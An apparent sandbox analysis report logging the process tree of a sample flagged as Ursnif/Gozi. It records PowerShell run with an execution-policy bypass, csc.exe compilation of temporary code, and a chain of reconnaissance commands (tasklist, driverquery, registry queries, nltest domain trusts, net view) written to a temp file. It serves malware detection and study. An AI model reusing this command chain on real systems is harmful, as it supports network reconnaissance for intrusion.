Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Imagebase:	0x7ff635980000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5240, Parent PID: 3528

General

Target ID:	46
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5232, Parent PID: 6064

General

Target ID:	47
Start time:	15:04:26
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6060, Parent PID: 5240

General

Target ID:	48
Start time:	15:04:27
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5652, Parent PID: 5240

General

Target ID:	49
Start time:	15:04:27
Start date:	11/10/2022
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup 127.0.0.1
Imagebase:	0x7ff7816b0000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5444, Parent PID: 3528

General

Target ID:	50
Start time:	15:04:28
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4108, Parent PID: 5444

General

Target ID:	51
Start time:	15:04:28
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4680, Parent PID: 3528

General

Target ID:	52
Start time:	15:04:29
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2692, Parent PID: 4680

General

Target ID:	53
Start time:	15:04:30
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: tasklist.exePID: 3064, Parent PID: 4680

General

Target ID:	54
Start time:	15:04:30
Start date:	11/10/2022
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist.exe /SVC
Imagebase:	0x7ff791330000
File size:	100352 bytes
MD5 hash:	B12E0F9C42075B4B7AD01D0B6A48485D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3664, Parent PID: 3528

General

Target ID:	55
Start time:	15:04:36
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4564, Parent PID: 3664

General

Target ID:	56
Start time:	15:04:36
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4708, Parent PID: 3528

General

Target ID:	57
Start time:	15:04:39
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2760, Parent PID: 4708

General

Target ID:	58
Start time:	15:04:41
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: driverquery.exePID: 5316, Parent PID: 4708

General

Target ID:	59
Start time:	15:04:41
Start date:	11/10/2022
Path:	C:\Windows\System32\driverquery.exe
Wow64 process (32bit):	false
Commandline:	driverquery.exe
Imagebase:	0x7ff6139f0000
File size:	81920 bytes
MD5 hash:	52ED960E5C82035A6FD2E3E52F8732A3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1028, Parent PID: 3528

General

Target ID:	60
Start time:	15:04:48
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0xe10000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2432, Parent PID: 1028

General

Target ID:	61
Start time:	15:04:49
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: csc.exePID: 5836, Parent PID: 6064

General

Target ID:	62
Start time:	15:04:49
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2736, Parent PID: 3528

General

Target ID:	63
Start time:	15:04:49
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4384, Parent PID: 2736

General

Target ID:	64
Start time:	15:04:50
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 4492, Parent PID: 2736

General

Target ID:	65
Start time:	15:04:50
Start date:	11/10/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Imagebase:	0x7ff7f7c60000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5176, Parent PID: 3528

General

Target ID:	66
Start time:	15:04:53
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cvtres.exePID: 1716, Parent PID: 5836

General

Target ID:	67
Start time:	15:04:54
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5024, Parent PID: 5176

General

Target ID:	68
Start time:	15:04:54
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1316, Parent PID: 3528

General

Target ID:	69
Start time:	15:04:54
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1240, Parent PID: 1316

General

Target ID:	70
Start time:	15:04:55
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net.exePID: 5880, Parent PID: 1316

General

Target ID:	71
Start time:	15:04:55
Start date:	11/10/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net config workstation
Imagebase:	0x7ff65f370000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net1.exePID: 5184, Parent PID: 5880

General

Target ID:	72
Start time:	15:04:55
Start date:	11/10/2022
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 config workstation
Imagebase:	0x7ff6f9bc0000
File size:	175104 bytes
MD5 hash:	AF569DE92AB6C1B9C681AF1E799F9983
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4584, Parent PID: 3528

General

Target ID:	73
Start time:	15:04:57
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 400, Parent PID: 4584

General

Target ID:	74
Start time:	15:04:57
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4532, Parent PID: 3528

General

Target ID:	75
Start time:	15:04:58
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4664, Parent PID: 4532

General

Target ID:	76
Start time:	15:04:58
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6992e0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nltest.exePID: 5620, Parent PID: 4532

General

Target ID:	77
Start time:	15:04:59
Start date:	11/10/2022
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff631910000
File size:	514048 bytes
MD5 hash:	3198EC1CA24B6CB75D597CEE39D71E58
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 504, Parent PID: 3528

General

Target ID:	78
Start time:	15:05:00
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3912, Parent PID: 504

General

Target ID:	79
Start time:	15:05:00
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3736, Parent PID: 3528

General

Target ID:	80
Start time:	15:05:01
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1172, Parent PID: 3736

General

Target ID:	81
Start time:	15:05:02
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nltest.exePID: 3852, Parent PID: 3736

General

Target ID:	82
Start time:	15:05:02
Start date:	11/10/2022
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff631910000
File size:	514048 bytes
MD5 hash:	3198EC1CA24B6CB75D597CEE39D71E58
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3576, Parent PID: 3528

General

Target ID:	83
Start time:	15:05:03
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5028, Parent PID: 3576

General

Target ID:	84
Start time:	15:05:04
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2468, Parent PID: 3528

General

Target ID:	85
Start time:	15:05:04
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2472, Parent PID: 2468

General

Target ID:	86
Start time:	15:05:05
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: net.exePID: 5000, Parent PID: 2468

General

Target ID:	87
Start time:	15:05:05
Start date:	11/10/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff65f370000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: csc.exePID: 3536, Parent PID: 6064

General

Target ID:	88
Start time:	15:05:07
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 5240, Parent PID: 3536

General

Target ID:	89
Start time:	15:05:15
Start date:	11/10/2022
